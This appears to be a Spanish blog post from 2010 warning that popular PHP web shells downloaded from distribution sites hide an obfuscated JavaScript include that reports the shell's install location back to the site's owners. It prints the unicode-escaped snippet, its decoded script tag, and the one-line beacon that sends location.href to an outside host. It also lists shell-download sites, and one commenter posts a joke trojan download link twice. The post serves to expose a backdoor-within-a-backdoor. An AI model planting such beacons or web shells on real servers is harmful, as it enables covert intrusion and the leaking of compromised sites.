04 agosto 2010

Quien roba a un ladrón...


Que duro es ser script-kiddie últimamente, y es que uno se lía con un servidor compartido de un colega de esos de 10€/mes y cuando te das cuenta estas buscando una imagen de un pinguino sacando cuernos a lo Metallica para ponérsela como página principal de su web.

Lo más normal tras conseguir acceso al servidor es colocar alguna puerta trasera que permita volver a entrar cuando uno quiera. Como por ejemplo las shells en php tan típicas en entornos LAMP. Entre las más populares y usadas: r57, c99, c100, mysqlshell, etcétera.

Si te ocurre como yo y no tienes a mano una de estas aplicaciones lo normal es buscarla en Internet para acabar en algún portal como phpshell.net, aunque te recomiendo que sigas leyendo hasta el final la entrada antes de usar alguna de ellas.



Por si acaso hay dudas, el código de estas shells esta ofuscado para que no se pueda leer directamente y tengas que pasarte tu rato si quieres hacer alguna modificación.

Tras el trabajo sucio, una de las líneas llama un script en javascript localizado en el servidor del que se ha descargado. Por ejemplo:

<script type="text/javascript">
document.write('\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063
\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0070
\u0068\u0070\u0073\u0068\u0065\u006c\u006c\u002e\u006e\u0065\u0074\u002f\u0073
\u0068\u0061\u0064\u006f\u0077\u002f\u006b\u0061\u0079\u0064\u0065\u0074\u002e
\u006a\u0073\u003e\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e')
</script>

O lo que es lo mismo:

<script src="http://www.phpshell.net/shadow/kaydet.js">
</script>

El pequeño javascript  mandará un GET a un php con la URL donde se ha instalado la shell, revelando donde ir para obtener el acceso al sistema.

a=new/**/Image();a.src='http://www.phpshell.net/shadow/kaydet.php?a='+escape(location.href);

Una petición de ejemplo de nuestro navegador sería la siguiente:


Lo mejor de todo es que esto no es un caso aislado, hay varias páginas que amablemente te permiten descargar las phpshells y tienen el mismo sistema montado, como: http://r57.gen.tr, http://saldiri.org, http://www.c99shell.com/, http://sh3llz.org/ y ... unas decenas más

Así que ojo amigo conductor, que lo mismo revelas donde has instalado tu backdoor.

7 comments :

debra dijo...

Vaya! así que al final va a ser mejor hacerlo uno mism.o. Al menos es constructivo, y más seguro :?

Gracias por el aviso :)

Anónimo dijo...

Otro caso de estos son los kits de phishing que suben en internet con codigo ofuscado. Cuando consigues credenciales de las victimas tambien se le envian por correo al creador del scam, y es que de los carders no se puede fiar nadie ... no sabia el caso de las shells =)

Feliz veranooo!

fossie dijo...

Opino igual, lo mejor es hacersela uno mismo para estar seguro de lo que hace. Es más curro pero más constructivo y más util.

Una vez pase por c99shell.com y descargue una shell para ponerla en mi propio servidor y provar que tal era pero tras las pruebas la quite. No se si hizo algun "ping" o no pero ya no esta en mi servidor asi que poco podran hacer (espero ;D)

vierito5 dijo...

Oiga, con esta no pasa nada

http://mytrojan.ru/phpshell.exe

mgesteiro dijo...

mismo truco, nuevo entorno.

algo parecido ocurrió (ocurre) con los exploits:

por qué debes aprender ensamblador

gran entrada!

svoboda dijo...

La verdad es que sea para lo que sea, todo lo que descargas de internet hay que mirarlo con lupa, salvo aquellas descargas de páginas confiables (o quizás estas también :p). Y desde luego hay que mirar y mucho todas las soluciones prenlatadas que te bajas, ya sean scripts, troyanos o demás, porque al igual que tu las usas, otros pueden estar haciendo uso de tu "trabajo". No todo el que cuelga cosas en internet lo hace sin segundas intenciones, y más de una sorpresa nos podemos llevar.

vierito5 dijo...

Oiga, con esta no pasa nada

http://mytrojan.ru/phpshell.exe